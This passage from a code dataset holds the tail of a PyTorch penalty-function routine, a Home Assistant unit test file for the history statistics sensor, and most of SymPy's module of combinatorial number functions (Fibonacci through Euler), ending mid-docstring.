pen_loss = 0.0\n for p, lam in zip(p_list, lam_list):\n mask = (p - lam / mu) <= 0\n mask_alt = (p - lam / mu) > 0\n p_l = torch.sum((- lam * p + 0.5 * mu * (p ** 2)) * mask)\n p_l += torch.sum((-1/(2 * mu) * lam ** 2) * mask_alt)\n pen_loss += p_l\n return pen_loss\n\n\ndef integer_penalty_update(p_list, lam_list, mu):\n new_lam_list = []\n with torch.no_grad():\n for p, lam in zip(p_list, lam_list):\n upd = lam - mu * p\n new_lam_list.append(upd * (upd > 0))\n new_mu = mu * 1.01\n return new_lam_list, new_mu\n\n\ndef compute_ytau(tau, f_list, p_list):\n y_tau = []\n y_tau_prime = []\n for p, f in zip(p_list, f_list):\n eye = torch.eye(f.shape[0], device=f.device)\n qmat_inv = torch.inverse(eye + tau / 2 * f)\n y_ft = torch.matmul(qmat_inv, eye - tau / 2 * f)\n y_ft = torch.matmul(y_ft, p)\n y_ft_prime = - torch.matmul(qmat_inv, f)\n y_ft_prime = torch.matmul(y_ft_prime, (p + y_ft) / 2)\n\n y_tau.append(y_ft.clone())\n y_tau_prime.append(y_ft_prime.clone())\n return y_tau, y_tau_prime"} {"ext": "py", "sha": "1a2ec086e778aa964a840fc70cf9aae1d766560e", "content": "\"\"\"The test for the History Statistics sensor platform.\"\"\"\n# pylint: disable=protected-access\nfrom datetime import timedelta\nimport unittest\nfrom unittest.mock import patch\n\nfrom homeassistant.const import STATE_UNKNOWN\nfrom homeassistant.setup import setup_component\nfrom homeassistant.components.sensor.history_stats import HistoryStatsSensor\nimport homeassistant.core as ha\nfrom homeassistant.helpers.template import Template\nimport homeassistant.util.dt as dt_util\n\nfrom tests.common import init_recorder_component, get_test_home_assistant\n\n\nclass TestHistoryStatsSensor(unittest.TestCase):\n \"\"\"Test the History Statistics sensor.\"\"\"\n\n def setUp(self):\n \"\"\"Set up things to be run when tests are 
started.\"\"\"\n self.hass = get_test_home_assistant()\n\n def tearDown(self):\n \"\"\"Stop everything that was started.\"\"\"\n self.hass.stop()\n\n def test_setup(self):\n \"\"\"Test the history statistics sensor setup.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'state': 'on',\n 'start': '{{ now().replace(hour=0)'\n '.replace(minute=0).replace(second=0) }}',\n 'duration': '02:00',\n 'name': 'Test',\n }\n }\n\n self.assertTrue(setup_component(self.hass, 'sensor', config))\n\n state = self.hass.states.get('sensor.test')\n self.assertEqual(state.state, STATE_UNKNOWN)\n\n def test_period_parsing(self):\n \"\"\"Test the conversion from templates to period.\"\"\"\n today = Template('{{ now().replace(hour=0).replace(minute=0)'\n '.replace(second=0) }}', self.hass)\n duration = timedelta(hours=2, minutes=1)\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'test', 'on', today, None, duration, 'time', 'test')\n sensor2 = HistoryStatsSensor(\n self.hass, 'test', 'on', None, today, duration, 'time', 'test')\n\n sensor1.update_period()\n sensor1_start, sensor1_end = sensor1._period\n sensor2.update_period()\n sensor2_start, sensor2_end = sensor2._period\n\n # Start = 00:00:00\n self.assertEqual(sensor1_start.hour, 0)\n self.assertEqual(sensor1_start.minute, 0)\n self.assertEqual(sensor1_start.second, 0)\n\n # End = 02:01:00\n self.assertEqual(sensor1_end.hour, 2)\n self.assertEqual(sensor1_end.minute, 1)\n self.assertEqual(sensor1_end.second, 0)\n\n # Start = 21:59:00\n self.assertEqual(sensor2_start.hour, 21)\n self.assertEqual(sensor2_start.minute, 59)\n self.assertEqual(sensor2_start.second, 0)\n\n # End = 00:00:00\n self.assertEqual(sensor2_end.hour, 0)\n self.assertEqual(sensor2_end.minute, 0)\n self.assertEqual(sensor2_end.second, 0)\n\n def test_measure(self):\n \"\"\"Test the history statistics sensor measure.\"\"\"\n t0 = dt_util.utcnow() - timedelta(minutes=40)\n t1 = t0 + timedelta(minutes=20)\n t2 = dt_util.utcnow() - timedelta(minutes=10)\n\n # Start t0 t1 t2 End\n # |--20min--|--20min--|--10min--|--10min--|\n # |---off---|---on----|---off---|---on----|\n\n fake_states = {\n 'binary_sensor.test_id': [\n ha.State('binary_sensor.test_id', 'on', last_changed=t0),\n ha.State('binary_sensor.test_id', 'off', last_changed=t1),\n ha.State('binary_sensor.test_id', 'on', last_changed=t2),\n ]\n }\n\n start = Template('{{ as_timestamp(now()) - 3600 }}', self.hass)\n end = Template('{{ now() }}', self.hass)\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'binary_sensor.test_id', 'on', start, end, None,\n 'time', 'Test')\n\n sensor2 = HistoryStatsSensor(\n self.hass, 'unknown.id', 'on', start, end, None, 'time', 'Test')\n\n sensor3 = HistoryStatsSensor(\n self.hass, 'binary_sensor.test_id', 'on', start, end, None,\n 'count', 'test')\n\n sensor4 = HistoryStatsSensor(\n self.hass, 'binary_sensor.test_id', 'on', start, end, None,\n 'ratio', 'test')\n\n self.assertEqual(sensor1._type, 'time')\n self.assertEqual(sensor3._type, 'count')\n self.assertEqual(sensor4._type, 'ratio')\n\n with patch('homeassistant.components.history.'\n 'state_changes_during_period', return_value=fake_states):\n with patch('homeassistant.components.history.get_state',\n return_value=None):\n sensor1.update()\n sensor2.update()\n sensor3.update()\n sensor4.update()\n\n self.assertEqual(sensor1.state, 0.5)\n self.assertEqual(sensor2.state, None)\n self.assertEqual(sensor3.state, 2)\n self.assertEqual(sensor4.state, 50)\n\n def 
test_wrong_date(self):\n \"\"\"Test when start or end value is not a timestamp or a date.\"\"\"\n good = Template('{{ now() }}', self.hass)\n bad = Template('{{ TEST }}', self.hass)\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'test', 'on', good, bad, None, 'time', 'Test')\n sensor2 = HistoryStatsSensor(\n self.hass, 'test', 'on', bad, good, None, 'time', 'Test')\n\n before_update1 = sensor1._period\n before_update2 = sensor2._period\n\n sensor1.update_period()\n sensor2.update_period()\n\n self.assertEqual(before_update1, sensor1._period)\n self.assertEqual(before_update2, sensor2._period)\n\n def test_wrong_duration(self):\n \"\"\"Test when duration value is not a timedelta.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'name': 'Test',\n 'state': 'on',\n 'start': '{{ now() }}',\n 'duration': 'TEST',\n }\n }\n\n setup_component(self.hass, 'sensor', config)\n self.assertEqual(self.hass.states.get('sensor.test'), None)\n self.assertRaises(TypeError,\n setup_component(self.hass, 'sensor', config))\n\n def test_bad_template(self):\n \"\"\"Test Exception when the template cannot be parsed.\"\"\"\n bad = Template('{{ x - 12 }}', self.hass) # x is undefined\n duration = '01:00'\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'test', 'on', bad, None, duration, 'time', 'Test')\n sensor2 = HistoryStatsSensor(\n self.hass, 'test', 'on', None, bad, duration, 'time', 'Test')\n\n before_update1 = sensor1._period\n before_update2 = sensor2._period\n\n sensor1.update_period()\n sensor2.update_period()\n\n self.assertEqual(before_update1, sensor1._period)\n self.assertEqual(before_update2, sensor2._period)\n\n def test_not_enough_arguments(self):\n \"\"\"Test config when not enough arguments provided.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'name': 'Test',\n 'state': 'on',\n 'start': '{{ now() }}',\n }\n }\n\n setup_component(self.hass, 'sensor', config)\n self.assertEqual(self.hass.states.get('sensor.test'), None)\n self.assertRaises(TypeError,\n setup_component(self.hass, 'sensor', config))\n\n def test_too_many_arguments(self):\n \"\"\"Test config when too many arguments provided.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'name': 'Test',\n 'state': 'on',\n 'start': '{{ as_timestamp(now()) - 3600 }}',\n 'end': '{{ now() }}',\n 'duration': '01:00',\n }\n }\n\n setup_component(self.hass, 'sensor', config)\n self.assertEqual(self.hass.states.get('sensor.test'), None)\n self.assertRaises(TypeError,\n setup_component(self.hass, 'sensor', config))\n\n def init_recorder(self):\n \"\"\"Initialize the recorder.\"\"\"\n init_recorder_component(self.hass)\n self.hass.start()\n"} {"ext": "py", "sha": "1a2ec0ab7acb5ec52077bad2e5cfd184845ed972", "content": "\"\"\"\nThis module implements some special functions that commonly appear in\ncombinatorial contexts (e.g. 
in power series); in particular,\nsequences of rational numbers such as Bernoulli and Fibonacci numbers.\n\nFactorials, binomial coefficients and related functions are located in\nthe separate 'factorials' module.\n\"\"\"\n\nfrom __future__ import print_function, division\n\nfrom sympy.core import S, Symbol, Rational, Integer, Add, Dummy\nfrom sympy.core.compatibility import as_int, SYMPY_INTS, range\nfrom sympy.core.cache import cacheit\nfrom sympy.core.function import Function, expand_mul\nfrom sympy.core.numbers import E, pi\nfrom sympy.core.relational import LessThan, StrictGreaterThan\nfrom sympy.functions.combinatorial.factorials import binomial, factorial\nfrom sympy.functions.elementary.exponential import log\nfrom sympy.functions.elementary.integers import floor\nfrom sympy.functions.elementary.trigonometric import sin, cos, cot\nfrom sympy.functions.elementary.miscellaneous import sqrt\nfrom sympy.utilities.memoization import recurrence_memo\n\nfrom mpmath import bernfrac, workprec\nfrom mpmath.libmp import ifib as _ifib\n\n\ndef _product(a, b):\n p = 1\n for k in range(a, b + 1):\n p *= k\n return p\n\n\n\n# Dummy symbol used for computing polynomial sequences\n_sym = Symbol('x')\n_symbols = Function('x')\n\n\n#----------------------------------------------------------------------------#\n# #\n# Fibonacci numbers #\n# #\n#----------------------------------------------------------------------------#\n\nclass fibonacci(Function):\n r\"\"\"\n Fibonacci numbers / Fibonacci polynomials\n\n The Fibonacci numbers are the integer sequence defined by the\n initial terms F_0 = 0, F_1 = 1 and the two-term recurrence\n relation F_n = F_{n-1} + F_{n-2}. This definition\n extended to arbitrary real and complex arguments using\n the formula\n\n .. math :: F_z = \\frac{\\phi^z - \\cos(\\pi z) \\phi^{-z}}{\\sqrt 5}\n\n The Fibonacci polynomials are defined by F_1(x) = 1,\n F_2(x) = x, and F_n(x) = x*F_{n-1}(x) + F_{n-2}(x) for n > 2.\n For all positive integers n, F_n(1) = F_n.\n\n * fibonacci(n) gives the nth Fibonacci number, F_n\n * fibonacci(n, x) gives the nth Fibonacci polynomial in x, F_n(x)\n\n Examples\n ========\n\n >>> from sympy import fibonacci, Symbol\n\n >>> [fibonacci(x) for x in range(11)]\n [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n >>> fibonacci(5, Symbol('t'))\n t**4 + 3*t**2 + 1\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Fibonacci_number\n .. 
[2] http://mathworld.wolfram.com/FibonacciNumber.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, harmonic, lucas\n \"\"\"\n\n @staticmethod\n def _fib(n):\n return _ifib(n)\n\n @staticmethod\n @recurrence_memo([None, S.One, _sym])\n def _fibpoly(n, prev):\n return (prev[-2] + _sym*prev[-1]).expand()\n\n @classmethod\n def eval(cls, n, sym=None):\n if n is S.Infinity:\n return S.Infinity\n\n if n.is_Integer:\n n = int(n)\n if n < 0:\n return S.NegativeOne**(n + 1) * fibonacci(-n)\n if sym is None:\n return Integer(cls._fib(n))\n else:\n if n < 1:\n raise ValueError(\"Fibonacci polynomials are defined \"\n \"only for positive integer indices.\")\n return cls._fibpoly(n).subs(_sym, sym)\n\n def _eval_rewrite_as_sqrt(self, n):\n return 2**(-n)*sqrt(5)*((1 + sqrt(5))**n - (-sqrt(5) + 1)**n) / 5\n\n def _eval_rewrite_as_GoldenRatio(self,n):\n return (S.GoldenRatio**n - 1/(-S.GoldenRatio)**n)/(2*S.GoldenRatio-1)\n\n\nclass lucas(Function):\n \"\"\"\n Lucas numbers\n\n Lucas numbers satisfy a recurrence relation similar to that of\n the Fibonacci sequence, in which each term is the sum of the\n preceding two. They are generated by choosing the initial\n values L_0 = 2 and L_1 = 1.\n\n * lucas(n) gives the nth Lucas number\n\n Examples\n ========\n\n >>> from sympy import lucas\n\n >>> [lucas(x) for x in range(11)]\n [2, 1, 3, 4, 7, 11, 18, 29, 47, 76, 123]\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Lucas_number\n .. [2] http://mathworld.wolfram.com/LucasNumber.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, fibonacci, harmonic\n \"\"\"\n\n @classmethod\n def eval(cls, n):\n if n is S.Infinity:\n return S.Infinity\n\n if n.is_Integer:\n return fibonacci(n + 1) + fibonacci(n - 1)\n\n def _eval_rewrite_as_sqrt(self, n):\n return 2**(-n)*((1 + sqrt(5))**n + (-sqrt(5) + 1)**n)\n\n#----------------------------------------------------------------------------#\n# #\n# Bernoulli numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass bernoulli(Function):\n r\"\"\"\n Bernoulli numbers / Bernoulli polynomials\n\n The Bernoulli numbers are a sequence of rational numbers\n defined by B_0 = 1 and the recursive relation (n > 0)::\n\n n\n ___\n \\ / n + 1 \\\n 0 = ) | | * B .\n /___ \\ k / k\n k = 0\n\n They are also commonly defined by their exponential generating\n function, which is x/(exp(x) - 1). For odd indices > 1, the\n Bernoulli numbers are zero.\n\n The Bernoulli polynomials satisfy the analogous formula::\n\n n\n ___\n \\ / n \\ n-k\n B (x) = ) | | * B * x .\n n /___ \\ k / k\n k = 0\n\n Bernoulli numbers and Bernoulli polynomials are related as\n B_n(0) = B_n.\n\n We compute Bernoulli numbers using Ramanujan's formula::\n\n / n + 3 \\\n B = (A(n) - S(n)) / | |\n n \\ n /\n\n where A(n) = (n+3)/3 when n = 0 or 2 (mod 6), A(n) = -(n+3)/6\n when n = 4 (mod 6), and::\n\n [n/6]\n ___\n \\ / n + 3 \\\n S(n) = ) | | * B\n /___ \\ n - 6*k / n-6*k\n k = 1\n\n This formula is similar to the sum given in the definition, but\n cuts 2/3 of the terms. For Bernoulli polynomials, we use the\n formula in the definition.\n\n * bernoulli(n) gives the nth Bernoulli number, B_n\n * bernoulli(n, x) gives the nth Bernoulli polynomial in x, B_n(x)\n\n Examples\n ========\n\n >>> from sympy import bernoulli\n\n >>> [bernoulli(n) for n in range(11)]\n [1, -1/2, 1/6, 0, -1/30, 0, 1/42, 0, -1/30, 0, 5/66]\n >>> bernoulli(1000001)\n 0\n\n References\n ==========\n\n .. 
[1] http://en.wikipedia.org/wiki/Bernoulli_number\n .. [2] http://en.wikipedia.org/wiki/Bernoulli_polynomial\n .. [3] http://mathworld.wolfram.com/BernoulliNumber.html\n .. [4] http://mathworld.wolfram.com/BernoulliPolynomial.html\n\n See Also\n ========\n\n bell, catalan, euler, fibonacci, harmonic, lucas\n \"\"\"\n\n # Calculates B_n for positive even n\n @staticmethod\n def _calc_bernoulli(n):\n s = 0\n a = int(binomial(n + 3, n - 6))\n for j in range(1, n//6 + 1):\n s += a * bernoulli(n - 6*j)\n # Avoid computing each binomial coefficient from scratch\n a *= _product(n - 6 - 6*j + 1, n - 6*j)\n a //= _product(6*j + 4, 6*j + 9)\n if n % 6 == 4:\n s = -Rational(n + 3, 6) - s\n else:\n s = Rational(n + 3, 3) - s\n return s / binomial(n + 3, n)\n\n # We implement a specialized memoization scheme to handle each\n # case modulo 6 separately\n _cache = {0: S.One, 2: Rational(1, 6), 4: Rational(-1, 30)}\n _highest = {0: 0, 2: 2, 4: 4}\n\n @classmethod\n def eval(cls, n, sym=None):\n if n.is_Number:\n if n.is_Integer and n.is_nonnegative:\n if n is S.Zero:\n return S.One\n elif n is S.One:\n if sym is None:\n return -S.Half\n else:\n return sym - S.Half\n # Bernoulli numbers\n elif sym is None:\n if n.is_odd:\n return S.Zero\n n = int(n)\n # Use mpmath for enormous Bernoulli numbers\n if n > 500:\n p, q = bernfrac(n)\n return Rational(int(p), int(q))\n case = n % 6\n highest_cached = cls._highest[case]\n if n <= highest_cached:\n return cls._cache[n]\n # To avoid excessive recursion when, say, bernoulli(1000) is\n # requested, calculate and cache the entire sequence ... B_988,\n # B_994, B_1000 in increasing order\n for i in range(highest_cached + 6, n + 6, 6):\n b = cls._calc_bernoulli(i)\n cls._cache[i] = b\n cls._highest[case] = i\n return b\n # Bernoulli polynomials\n else:\n n, result = int(n), []\n for k in range(n + 1):\n result.append(binomial(n, k)*cls(k)*sym**(n - k))\n return Add(*result)\n else:\n raise ValueError(\"Bernoulli numbers are defined only\"\n \" for nonnegative integer indices.\")\n\n if sym is None:\n if n.is_odd and (n - 1).is_positive:\n return S.Zero\n\n\n#----------------------------------------------------------------------------#\n# #\n# Bell numbers #\n# #\n#----------------------------------------------------------------------------#\n\nclass bell(Function):\n r\"\"\"\n Bell numbers / Bell polynomials\n\n The Bell numbers satisfy `B_0 = 1` and\n\n .. math:: B_n = \\sum_{k=0}^{n-1} \\binom{n-1}{k} B_k.\n\n They are also given by:\n\n .. math:: B_n = \\frac{1}{e} \\sum_{k=0}^{\\infty} \\frac{k^n}{k!}.\n\n The Bell polynomials are given by `B_0(x) = 1` and\n\n .. math:: B_n(x) = x \\sum_{k=1}^{n-1} \\binom{n-1}{k-1} B_{k-1}(x).\n\n The second kind of Bell polynomials (are sometimes called \"partial\" Bell\n polynomials or incomplete Bell polynomials) are defined as\n\n .. 
math:: B_{n,k}(x_1, x_2,\\dotsc x_{n-k+1}) =\n \\sum_{j_1+j_2+j_2+\\dotsb=k \\atop j_1+2j_2+3j_2+\\dotsb=n}\n \\frac{n!}{j_1!j_2!\\dotsb j_{n-k+1}!}\n \\left(\\frac{x_1}{1!} \\right)^{j_1}\n \\left(\\frac{x_2}{2!} \\right)^{j_2} \\dotsb\n \\left(\\frac{x_{n-k+1}}{(n-k+1)!} \\right) ^{j_{n-k+1}}.\n\n * bell(n) gives the `n^{th}` Bell number, `B_n`.\n * bell(n, x) gives the `n^{th}` Bell polynomial, `B_n(x)`.\n * bell(n, k, (x1, x2, ...)) gives Bell polynomials of the second kind,\n `B_{n,k}(x_1, x_2, \\dotsc, x_{n-k+1})`.\n\n Notes\n =====\n\n Not to be confused with Bernoulli numbers and Bernoulli polynomials,\n which use the same notation.\n\n Examples\n ========\n\n >>> from sympy import bell, Symbol, symbols\n\n >>> [bell(n) for n in range(11)]\n [1, 1, 2, 5, 15, 52, 203, 877, 4140, 21147, 115975]\n >>> bell(30)\n 846749014511809332450147\n >>> bell(4, Symbol('t'))\n t**4 + 6*t**3 + 7*t**2 + t\n >>> bell(6, 2, symbols('x:6')[1:])\n 6*x1*x5 + 15*x2*x4 + 10*x3**2\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Bell_number\n .. [2] http://mathworld.wolfram.com/BellNumber.html\n .. [3] http://mathworld.wolfram.com/BellPolynomial.html\n\n See Also\n ========\n\n bernoulli, catalan, euler, fibonacci, harmonic, lucas\n \"\"\"\n\n @staticmethod\n @recurrence_memo([1, 1])\n def _bell(n, prev):\n s = 1\n a = 1\n for k in range(1, n):\n a = a * (n - k) // k\n s += a * prev[k]\n return s\n\n @staticmethod\n @recurrence_memo([S.One, _sym])\n def _bell_poly(n, prev):\n s = 1\n a = 1\n for k in range(2, n + 1):\n a = a * (n - k + 1) // (k - 1)\n s += a * prev[k - 1]\n return expand_mul(_sym * s)\n\n @staticmethod\n def _bell_incomplete_poly(n, k, symbols):\n r\"\"\"\n The second kind of Bell polynomials (incomplete Bell polynomials).\n\n Calculated by recurrence formula:\n\n .. math:: B_{n,k}(x_1, x_2, \\dotsc, x_{n-k+1}) =\n \\sum_{m=1}^{n-k+1}\n \\x_m \\binom{n-1}{m-1} B_{n-m,k-1}(x_1, x_2, \\dotsc, x_{n-m-k})\n\n where\n B_{0,0} = 1;\n B_{n,0} = 0; for n>=1\n B_{0,k} = 0; for k>=1\n\n \"\"\"\n if (n == 0) and (k == 0):\n return S.One\n elif (n == 0) or (k == 0):\n return S.Zero\n s = S.Zero\n a = S.One\n for m in range(1, n - k + 2):\n s += a * bell._bell_incomplete_poly(\n n - m, k - 1, symbols) * symbols[m - 1]\n a = a * (n - m) / m\n return expand_mul(s)\n\n @classmethod\n def eval(cls, n, k_sym=None, symbols=None):\n if n.is_Integer and n.is_nonnegative:\n if k_sym is None:\n return Integer(cls._bell(int(n)))\n elif symbols is None:\n return cls._bell_poly(int(n)).subs(_sym, k_sym)\n else:\n r = cls._bell_incomplete_poly(int(n), int(k_sym), symbols)\n return r\n\n def _eval_rewrite_as_Sum(self, n, k_sym=None, symbols=None):\n from sympy import Sum\n if (k_sym is not None) or (symbols is not None):\n return self\n\n # Dobinski's formula\n if not n.is_nonnegative:\n return self\n k = Dummy('k', integer=True, nonnegative=True)\n return 1 / E * Sum(k**n / factorial(k), (k, 0, S.Infinity))\n\n#----------------------------------------------------------------------------#\n# #\n# Harmonic numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass harmonic(Function):\n r\"\"\"\n Harmonic numbers\n\n The nth harmonic number is given by `\\operatorname{H}_{n} =\n 1 + \\frac{1}{2} + \\frac{1}{3} + \\ldots + \\frac{1}{n}`.\n\n More generally:\n\n .. 
math:: \\operatorname{H}_{n,m} = \\sum_{k=1}^{n} \\frac{1}{k^m}\n\n As `n \\rightarrow \\infty`, `\\operatorname{H}_{n,m} \\rightarrow \\zeta(m)`,\n the Riemann zeta function.\n\n * ``harmonic(n)`` gives the nth harmonic number, `\\operatorname{H}_n`\n\n * ``harmonic(n, m)`` gives the nth generalized harmonic number\n of order `m`, `\\operatorname{H}_{n,m}`, where\n ``harmonic(n) == harmonic(n, 1)``\n\n Examples\n ========\n\n >>> from sympy import harmonic, oo\n\n >>> [harmonic(n) for n in range(6)]\n [0, 1, 3/2, 11/6, 25/12, 137/60]\n >>> [harmonic(n, 2) for n in range(6)]\n [0, 1, 5/4, 49/36, 205/144, 5269/3600]\n >>> harmonic(oo, 2)\n pi**2/6\n\n >>> from sympy import Symbol, Sum\n >>> n = Symbol(\"n\")\n\n >>> harmonic(n).rewrite(Sum)\n Sum(1/_k, (_k, 1, n))\n\n We can evaluate harmonic numbers for all integral and positive\n rational arguments:\n\n >>> from sympy import S, expand_func, simplify\n >>> harmonic(8)\n 761/280\n >>> harmonic(11)\n 83711/27720\n\n >>> H = harmonic(1/S(3))\n >>> H\n harmonic(1/3)\n >>> He = expand_func(H)\n >>> He\n -log(6) - sqrt(3)*pi/6 + 2*Sum(log(sin(_k*pi/3))*cos(2*_k*pi/3), (_k, 1, 1))\n + 3*Sum(1/(3*_k + 1), (_k, 0, 0))\n >>> He.doit()\n -log(6) - sqrt(3)*pi/6 - log(sqrt(3)/2) + 3\n >>> H = harmonic(25/S(7))\n >>> He = simplify(expand_func(H).doit())\n >>> He\n log(sin(pi/7)**(-2*cos(pi/7))*sin(2*pi/7)**(2*cos(16*pi/7))*cos(pi/14)**(-2*sin(pi/14))/14)\n + pi*tan(pi/14)/2 + 30247/9900\n >>> He.n(40)\n 1.983697455232980674869851942390639915940\n >>> harmonic(25/S(7)).n(40)\n 1.983697455232980674869851942390639915940\n\n We can rewrite harmonic numbers in terms of polygamma functions:\n\n >>> from sympy import digamma, polygamma\n >>> m = Symbol(\"m\")\n\n >>> harmonic(n).rewrite(digamma)\n polygamma(0, n + 1) + EulerGamma\n\n >>> harmonic(n).rewrite(polygamma)\n polygamma(0, n + 1) + EulerGamma\n\n >>> harmonic(n,3).rewrite(polygamma)\n polygamma(2, n + 1)/2 - polygamma(2, 1)/2\n\n >>> harmonic(n,m).rewrite(polygamma)\n (-1)**m*(polygamma(m - 1, 1) - polygamma(m - 1, n + 1))/factorial(m - 1)\n\n Integer offsets in the argument can be pulled out:\n\n >>> from sympy import expand_func\n\n >>> expand_func(harmonic(n+4))\n harmonic(n) + 1/(n + 4) + 1/(n + 3) + 1/(n + 2) + 1/(n + 1)\n\n >>> expand_func(harmonic(n-4))\n harmonic(n) - 1/(n - 1) - 1/(n - 2) - 1/(n - 3) - 1/n\n\n Some limits can be computed as well:\n\n >>> from sympy import limit, oo\n\n >>> limit(harmonic(n), n, oo)\n oo\n\n >>> limit(harmonic(n, 2), n, oo)\n pi**2/6\n\n >>> limit(harmonic(n, 3), n, oo)\n -polygamma(2, 1)/2\n\n However we can not compute the general relation yet:\n\n >>> limit(harmonic(n, m), n, oo)\n harmonic(oo, m)\n\n which equals ``zeta(m)`` for ``m > 1``.\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Harmonic_number\n .. [2] http://functions.wolfram.com/GammaBetaErf/HarmonicNumber/\n .. 
[3] http://functions.wolfram.com/GammaBetaErf/HarmonicNumber2/\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, fibonacci, lucas\n \"\"\"\n\n # Generate one memoized Harmonic number-generating function for each\n # order and store it in a dictionary\n _functions = {}\n\n @classmethod\n def eval(cls, n, m=None):\n from sympy import zeta\n if m is S.One:\n return cls(n)\n if m is None:\n m = S.One\n\n if m.is_zero:\n return n\n\n if n is S.Infinity and m.is_Number:\n # TODO: Fix for symbolic values of m\n if m.is_negative:\n return S.NaN\n elif LessThan(m, S.One):\n return S.Infinity\n elif StrictGreaterThan(m, S.One):\n return zeta(m)\n else:\n return cls\n\n if n.is_Integer and n.is_nonnegative and m.is_Integer:\n if n == 0:\n return S.Zero\n if not m in cls._functions:\n @recurrence_memo([0])\n def f(n, prev):\n return prev[-1] + S.One / n**m\n cls._functions[m] = f\n return cls._functions[m](int(n))\n\n def _eval_rewrite_as_polygamma(self, n, m=1):\n from sympy.functions.special.gamma_functions import polygamma\n return S.NegativeOne**m/factorial(m - 1) * (polygamma(m - 1, 1) - polygamma(m - 1, n + 1))\n\n def _eval_rewrite_as_digamma(self, n, m=1):\n from sympy.functions.special.gamma_functions import polygamma\n return self.rewrite(polygamma)\n\n def _eval_rewrite_as_trigamma(self, n, m=1):\n from sympy.functions.special.gamma_functions import polygamma\n return self.rewrite(polygamma)\n\n def _eval_rewrite_as_Sum(self, n, m=None):\n from sympy import Sum\n k = Dummy(\"k\", integer=True)\n if m is None:\n m = S.One\n return Sum(k**(-m), (k, 1, n))\n\n def _eval_expand_func(self, **hints):\n from sympy import Sum\n n = self.args[0]\n m = self.args[1] if len(self.args) == 2 else 1\n\n if m == S.One:\n if n.is_Add:\n off = n.args[0]\n nnew = n - off\n if off.is_Integer and off.is_positive:\n result = [S.One/(nnew + i) for i in range(off, 0, -1)] + [harmonic(nnew)]\n return Add(*result)\n elif off.is_Integer and off.is_negative:\n result = [-S.One/(nnew + i) for i in range(0, off, -1)] + [harmonic(nnew)]\n return Add(*result)\n\n if n.is_Rational:\n # Expansions for harmonic numbers at general rational arguments (u + p/q)\n # Split n as u + p/q with p < q\n p, q = n.as_numer_denom()\n u = p // q\n p = p - u * q\n if u.is_nonnegative and p.is_positive and q.is_positive and p < q:\n k = Dummy(\"k\")\n t1 = q * Sum(1 / (q * k + p), (k, 0, u))\n t2 = 2 * Sum(cos((2 * pi * p * k) / S(q)) *\n log(sin((pi * k) / S(q))),\n (k, 1, floor((q - 1) / S(2))))\n t3 = (pi / 2) * cot((pi * p) / q) + log(2 * q)\n return t1 + t2 - t3\n\n return self\n\n def _eval_rewrite_as_tractable(self, n, m=1):\n from sympy import polygamma\n return self.rewrite(polygamma).rewrite(\"tractable\", deep=True)\n\n def _eval_evalf(self, prec):\n from sympy import polygamma\n if all(i.is_number for i in self.args):\n return self.rewrite(polygamma)._eval_evalf(prec)\n\n\n#----------------------------------------------------------------------------#\n# #\n# Euler numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass euler(Function):\n r\"\"\"\n Euler numbers\n\n The euler numbers are given by::\n\n 2*n+1 k\n ___ ___ j 2*n+1\n \\ \\ / k \\ (-1) * (k-2*j)\n E = I ) ) | | --------------------\n 2n /___ /___ \\ j / k k\n k = 1 j = 0 2 * I * k\n\n E = 0\n 2n+1\n\n * euler(n) gives the n-th Euler number, E_n\n\n Examples\n ========\n\n >>> from sympy import Symbol\n >>> from sympy.functions import euler\n >>> [euler(n) for n in range(10)]\n [1, 0, -1, 0, 5, 0, -61, 0, 
1385, 0]\n >>> n = Symbol(\"n\")\n >>> euler(n+2*n)\n euler(3*n)\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Euler_numbers\n .. [2] http://mathworld.wolfram.com/EulerNumber.html\n .. [3] http://en.wikipedia.org/wiki/Alternating_permutation\n .. [4] http://mathworld.wolfram.com/AlternatingPermutation.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, fibonacci, harmonic, lucas\n \"\"\"\n\n @classmethod\n def eval(cls, m):\n if m.is_odd:\n return S.Zero\n if m.is_Integer and m.is_nonnegative:\n from mpmath import mp\n m = m._to_mpmath(mp.prec)\n res = mp.eulernum(m, exact=True)\n return Integer(res)\n\n def _eval_rewrite_as_Sum(self, arg):\n from sympy import Sum\n if arg.is_even:\n k = Dummy(\"k\", integer=True)\n j = Dummy(\"j\", integer=True)\n n = self.args[0] / 2\n Em = (S.ImaginaryUnit * Sum(Sum(binomial(k, j) * ((-1)**j * (k - 2*j)**(2*n + 1)) /\n (2**k*S.ImaginaryUnit**k * k), (j, 0, k)), (k, 1, 2*n + 1)))\n\n return Em\n\n def _eval_evalf(self, prec):\n m = self.args[0]\n\n if m.is_Integer and m.is_nonnegative:\n from mpmath import mp\n from sympy import Expr\n m = m._to_mpmath(prec)\n with workprec(prec):\n res = mp.eulernum(m)\n return Expr._from_mpmath(res, prec)\n\n#----------------------------------------------------------------------------#\n# #\n# Catalan numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass catalan(Function):\n r\"\"\"\n Catalan numbers\n\n The n-th catalan number is given by::\n\n 1 / 2*n \\\n C = ----- | |\n n n + 1 